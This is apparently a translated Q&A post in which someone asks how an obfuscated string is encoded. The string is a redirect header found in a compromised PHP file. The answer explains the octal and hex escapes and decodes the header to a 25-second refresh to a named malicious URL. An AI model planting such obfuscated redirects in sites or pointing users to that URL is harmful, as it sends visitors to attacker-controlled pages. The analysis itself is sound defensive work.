Bin*_*ary 2 url apache-http-server php
我在受损的 php 文件中发现了一些 base64 编码的文本。当我解码 base64 字符串时,它是以下指令:
header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");
该 URL 字符串是什么类型的编码?我最初认为是十六进制,然后是 ascii,但它的长度可变。我做了谷歌,但无济于事。有人可以指出我正确的方向吗?
警告:
以下 URL 来自受感染的网站。
访问它会使攻击者在经济上受益,并可能损害您的计算机。
字符串的意思
Refresh: 25; url="http://fcbarcelonadodocom.info/uk"
\145是代码点 145(八进制),\x66是代码点 66(十六进制)。
验证:
执行
php
类型
<?php
echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"";
?>
按Ctrl+ D。
| 归档时间: |
|
| 查看次数: |
345 次 |
| 最近记录: |